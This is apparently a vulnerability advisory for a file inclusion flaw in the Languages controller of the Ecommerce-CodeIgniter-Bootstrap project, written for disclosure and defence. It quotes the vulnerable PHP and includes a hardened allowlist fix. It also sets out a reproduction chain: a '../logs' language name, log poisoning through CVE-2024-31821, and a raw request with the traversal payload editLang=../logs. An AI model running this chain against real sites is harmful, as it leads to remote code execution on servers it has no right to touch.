vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)
version: before Vulnerability fixes from Lion Tree · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e (github.com)
A file inclusion vulnerability exists in the getLangFolderForEdit() method of application/modules/admin/controllers/advanced_settings/Languages.php. By controlling $_GET['editLang'], an attacker can make the server include .php files from a directory of their choosing relative to application/language/.

The attacker can use CVE-2024-31821 to write malicious PHP code into log-xxxx.php and then use this vulnerability to include the PHP files under application/logs/ (at this point BASEPATH has already been defined, so the check at the beginning of the log file is bypassed), which leads to remote code execution.
```php
// application/modules/admin/controllers/advanced_settings/Languages.php
// $_GET['editLang'] is concatenated into the directory path unvalidated and
// every .php file found there is require'd.
private function getLangFolderForEdit()
{
    $langFiles = array();
    $files = rreadDir('application' . DIRECTORY_SEPARATOR . 'language' . DIRECTORY_SEPARATOR . '' . $_GET['editLang'] . DIRECTORY_SEPARATOR);
    $arrPhpFiles = $arrJsFiles = array();
    foreach ($files as $ext => $filesLang) {
        foreach ($filesLang as $fileLang) {
            if ($ext == 'php') {
                require $fileLang;   // executes any PHP file in the resolved directory
                if (isset($lang)) {
                    $arrPhpFiles[$fileLang] = $lang;
                    unset($lang);
                }
            }
            if ($ext == 'js') {
                $jsTrans = file_get_contents($fileLang);
                preg_match_all('/(.+?)"(.+?)"/', $jsTrans, $PMA);
                $arrJsFiles[$fileLang] = $PMA;
                unset($PMA);
            }
        }
    }
    $langFiles[0] = $arrPhpFiles;
    $langFiles[1] = $arrJsFiles;
    return $langFiles;
}
```

The only guard before the call is a database lookup of the language name, which accepts any string that was previously stored as a language name:

```php
// Same controller: the editLang value is only checked against the languages table.
if (isset($_GET['editLang'])) {
    $num = $this->Languages_model->countLangs($_GET['editLang']);
    if ($num == 0) {
        redirect('admin/languages');
    }
    $langFiles = $this->getLangFolderForEdit();
}
```

```php
// Languages_model: counts rows whose name (or abbr) matches; no path validation.
public function countLangs($name = null, $abbr = null)
{
    if ($name != null) {
        $this->db->where('name', $name);
    }
    if ($abbr != null) {
        $this->db->or_where('abbr', $abbr);
    }
    return $this->db->count_all_results('languages');
}
```
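As an added illustration of the fix a defender would apply (this is example code, not the project's own patch), the directory resolution can be replaced by a helper that allowlists the folder name and verifies the canonical path stays inside application/language/. The helper name langDirFor() and the temporary directory layout are assumptions for the demonstration.

```php
<?php
// Hardened replacement for the path building in getLangFolderForEdit().
// langDirFor() is a hypothetical helper name (not from the project).
function langDirFor(string $editLang, string $baseDir): ?string
{
    // 1. Allowlist: a language folder is a short, plain name. This alone
    //    rejects "../logs", any slash, NUL bytes and URL tricks.
    if (!preg_match('/^[A-Za-z0-9_-]{1,40}$/', $editLang)) {
        return null;
    }

    // 2. Canonicalise and confirm containment. realpath() collapses ".."
    //    and symlinks and returns false for a missing path, so a non-null
    //    result is a real directory located under $baseDir.
    $base = realpath($baseDir);
    $dir  = realpath($baseDir . DIRECTORY_SEPARATOR . $editLang);
    if ($base === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    if (strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir . DIRECTORY_SEPARATOR;
}

// Demonstration on a constructed temporary tree mirroring the app layout.
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'langcheck_' . getmypid();
mkdir($tmp . '/application/language/english', 0700, true);
mkdir($tmp . '/application/logs', 0700, true);
$base = $tmp . '/application/language';

var_dump(langDirFor('english', $base) !== null);  // bool(true): legitimate folder
var_dump(langDirFor('../logs', $base));            // NULL: rejected by the allowlist
var_dump(langDirFor('missing', $base));            // NULL: realpath() fails
```

The same allowlist should also be applied when a language is created, so that a name such as `../logs` never reaches the languages table in the first place.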
The steps to reproduce are as follows:

- Add a new language called `../logs`, so that the check `$num = $this->Languages_model->countLangs($_GET['editLang']);` passes.
- Use the previous SQL injection vulnerability (CVE-2024-31821) to write malicious PHP code into the log file. This step must be done after the first step, because adding a language clears the log file.
- Edit the language `../logs`:
```http
GET /Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=../logs HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/languages
Cookie: ci_session=inm96ingrq5a7murjrsmvjc7o7ke83jg; shopping_cart=a%3A1%3A%7Bi%3A0%3Bi%3A2%3B%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```